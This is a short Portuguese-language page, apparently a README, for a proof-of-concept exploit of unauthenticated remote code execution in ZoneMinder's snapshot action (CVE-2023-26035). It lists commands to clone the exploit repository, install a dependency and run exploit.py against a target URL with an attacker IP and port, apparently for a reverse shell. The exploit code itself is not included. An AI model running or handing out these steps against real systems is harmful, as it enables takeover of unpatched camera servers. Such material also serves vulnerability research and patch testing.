
RCE não autenticado em ZoneMinder Snapshots - PoC Exploit
RCE não autenticado em Snapshots do ZoneMinder - PoC Exploit
alt img
Versões do ZoneMinder anteriores a 1.36.33 e 1.37.33 são vulneráveis a Execução Remota de Código não autenticada devido à falta de verificações de autorização na ação de snapshot.
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
UnblvR descobriu a vulnerabilidade.